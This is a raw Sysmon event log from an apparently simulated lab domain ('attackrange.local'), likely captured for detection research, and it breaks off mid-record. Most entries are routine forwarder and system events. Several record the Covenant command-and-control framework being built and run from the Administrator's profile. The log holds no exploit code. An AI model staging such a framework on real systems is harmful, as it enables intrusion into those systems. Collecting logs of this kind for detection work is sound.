AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FD1C0E5175CDCE3CC76012273235D99,SHA256=31488D8DB1A906A99D6980E1E250C43580AA814C47E7B9F7BF9FA2B425757EE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149851Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:52.004{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=262D3EEF32197DB07EB22037258602E0,SHA256=3EF6DA76B3DD0ADAA23166EDD800795C3C23297109B53756F43745AC68D3DE63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104540Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:53.620{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=223538A44941BD8D44A586B88E3CF39A,SHA256=2D56CB4E5BE4FD00624481267BFB1EA1F86C245385305FDE7BD208250296B9CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149856Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:53.489{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3250AE45B7FAB1110B1832B9143E2A42,SHA256=5AA1828953DDD565232E32F7C0AE3370641F2F2CC63E3A88AACDB84589CA6C14,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000149855Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:50.972{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58341-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000149854Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:53.150{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75650402F68563F55D534FB43D75972E,SHA256=6141749E72EF6D9BFD17BF8FECC10A8EAC7DDA225608454DEE7D85FD3719BEE5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104541Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:52.744{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55387-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 17141700x8000000000000000149866Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-CreatePipe2021-06-16 21:43:54.672{39BD8DE3-709A-60CA-080D-00000000D101}4924\dotnet-diagnostic-4924C:\Program Files\dotnet\dotnet.exe 23542300x8000000000000000149865Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.151{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=138C6C1FAE36531C07DB17C293385764,SHA256=D43F53B3B12C726D954D6D99973B0EAE5FC9757315FFD0C9D5909778814803E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149864Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.120{39BD8DE3-7094-60CA-070D-00000000D101}53246676C:\Windows\system32\conhost.exe{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149863Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.120{39BD8DE3-0FD7-60CA-7D00-00000000D101}2100104C:\Windows\system32\csrss.exe{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149862Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.104{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149861Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.104{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149860Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.104{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149859Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.104{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149858Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.104{39BD8DE3-7094-60CA-060D-00000000D101}54724040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b29b79c9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2c0f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2bd2d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b2902d8b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1de8c9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e4c711|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2e720|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2e720|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2e5b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e1f2d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2c813|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2c385|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2c0f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e2bd2d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b2902d8b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e10fd8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+b1e1054a 154100x8000000000000000149857Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:54.114{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe3,100,1621,26207 @Commit: 4c6b4aa257241c4d419b8c271e37afac4445b1c0.NET Core HostMicrosoft® .NET FrameworkMicrosoft Corporation.NET Core Host"C:\Program Files\dotnet\dotnet.exe" runC:\Users\Administrator\Covenant\Covenant\WIN-HOST-14\Administrator{39BD8DE3-0FD9-60CA-F738-070000000000}0x738f72HighMD5=86B9565BD1D12F1C2916EBE422A6E591,SHA256=C99BA84450057B14885D1DB955964D848E98DA8282551228187044129568607F,IMPHASH=CFC67134B5D9A38D4FF98F5257C14F6E{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000149882Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.890{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-709B-60CA-090D-00000000D101}6900C:\Program Files\dotnet\dotnet.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000149881Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-CreatePipe2021-06-16 21:43:55.774{39BD8DE3-709B-60CA-090D-00000000D101}6900\dotnet-diagnostic-6900C:\Program Files\dotnet\dotnet.exe 10341000x8000000000000000149880Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.621{39BD8DE3-7094-60CA-070D-00000000D101}53246676C:\Windows\system32\conhost.exe{39BD8DE3-709B-60CA-090D-00000000D101}6900C:\Program Files\dotnet\dotnet.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149879Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.621{39BD8DE3-0FD7-60CA-7D00-00000000D101}21002896C:\Windows\system32\csrss.exe{39BD8DE3-709B-60CA-090D-00000000D101}6900C:\Program Files\dotnet\dotnet.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149878Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.621{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149877Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.621{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149876Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.621{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149875Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.621{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149874Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.621{39BD8DE3-709A-60CA-080D-00000000D101}4924172C:\Program Files\dotnet\dotnet.exe{39BD8DE3-709B-60CA-090D-00000000D101}6900C:\Program Files\dotnet\dotnet.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF90F8D05FF) 154100x8000000000000000149873Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.624{39BD8DE3-709B-60CA-090D-00000000D101}6900C:\Program Files\dotnet\dotnet.exe3,100,1621,26207 @Commit: 4c6b4aa257241c4d419b8c271e37afac4445b1c0.NET Core HostMicrosoft® .NET FrameworkMicrosoft Corporation.NET Core Host"dotnet.exe" exec "C:\Program Files\dotnet\sdk\3.1.410\MSBuild.dll" -maxcpucount -verbosity:m -restore C:\Users\Administrator\Covenant\Covenant\Covenant.csproj -nologo -verbosity:quiet "-distributedlogger:Microsoft.DotNet.Tools.MSBuild.MSBuildLogger,C:\Program Files\dotnet\sdk\3.1.410\dotnet.dll*Microsoft.DotNet.Tools.MSBuild.MSBuildForwardingLogger,C:\Program Files\dotnet\sdk\3.1.410\dotnet.dll"C:\Users\Administrator\Covenant\Covenant\WIN-HOST-14\Administrator{39BD8DE3-0FD9-60CA-F738-070000000000}0x738f72HighMD5=86B9565BD1D12F1C2916EBE422A6E591,SHA256=C99BA84450057B14885D1DB955964D848E98DA8282551228187044129568607F,IMPHASH=CFC67134B5D9A38D4FF98F5257C14F6E{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe"C:\Program Files\dotnet\dotnet.exe" run 23542300x8000000000000000149872Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.253{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=39B877CBFF320DF4AC95762C9B9E9E1D,SHA256=EE30C6AE21C67F98865248CF951CAB1A3AF8F5CAA9A249F3A25D484341B194D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149871Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.253{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149870Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.173{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F1CFAE2735A54E8729FAAFDCB6F2EA3,SHA256=1CE4B792277F39BDAFCABCA03E20177521E86D07C6FD5B3DAD185A467CC94D41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149869Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.105{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DDD9619B471A1A777468F55CEAF74550,SHA256=E7389A73612110490BAE12D5436D4B19BA1819CF7CAC22B6AF307F73D325560F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149868Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.105{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6CCF7A18AAE289F4E880093D8C66533D,SHA256=888ACA3870BBDB5C0F0EA164B5D1764EF49AE01088CD61995FAEAF53E2BA9C0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149867Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:55.051{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104542Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:56.605{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F1A53773438BE021B376B913CCD8F4B,SHA256=A5DAD0F64B800CF290D8C3B2584A2D82D2B5348A926A1C8ECC34EB9920700F12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149884Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:56.198{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 